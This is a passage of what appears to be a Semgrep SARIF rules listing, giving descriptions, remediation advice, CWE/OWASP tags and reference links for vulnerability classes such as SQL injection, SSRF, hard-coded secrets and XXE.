Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","id":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","name":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","id":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","name":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher","id":"kotlin.lang.security.no-null-cipher.no-null-cipher","name":"kotlin.lang.security.no-null-cipher.no-null-cipher","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.no-null-cipher.no-null-cipher"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"help":{"markdown":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","id":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","name":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"help":{"markdown":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","id":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","name":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input)\n - [https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html](https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","id":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","name":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"help":{"markdown":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv)\n - [https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options)\n","text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","id":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","name":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","properties":{"precision":"very-high","tags":["CWE-1204: Generation of Weak Initialization Vector (IV)","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"help":{"markdown":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","id":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","name":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-regex-dos.check-regex-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm-express.vm-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm-express.vm-express","id":"javascript.express.code.vm-express.vm-express","name":"javascript.express.code.vm-express.vm-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm-express.vm-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"help":{"markdown":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation)\n - [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","id":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","name":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request)\n - [https://golang.org/pkg/net/http/#Get](https://golang.org/pkg/net/http/#Get)\n","text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","id":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","name":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.http-request.http-request"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"help":{"markdown":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp)\n - [https://docs.python.org/3/library/tempfile.html#tempfile.mktemp](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"helpUri":"https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp","id":"python.lang.file.avoid-mktemp.avoid-mktemp","name":"python.lang.file.avoid-mktemp.avoid-mktemp","properties":{"precision":"very-high","tags":["CWE-377: Insecure Temporary File","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.avoid-mktemp.avoid-mktemp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint","id":"go.net.sql.pg-sqli-taint.pg-sqli-taint","name":"go.net.sql.pg-sqli-taint.pg-sqli-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.sql.pg-sqli-taint.pg-sqli-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"help":{"markdown":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random","id":"java.lang.security.audit.crypto.weak-random.weak-random","name":"java.lang.security.audit.crypto.weak-random.weak-random","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-random.weak-random"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","id":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","name":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","id":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","name":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","id":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","name":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"help":{"markdown":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - 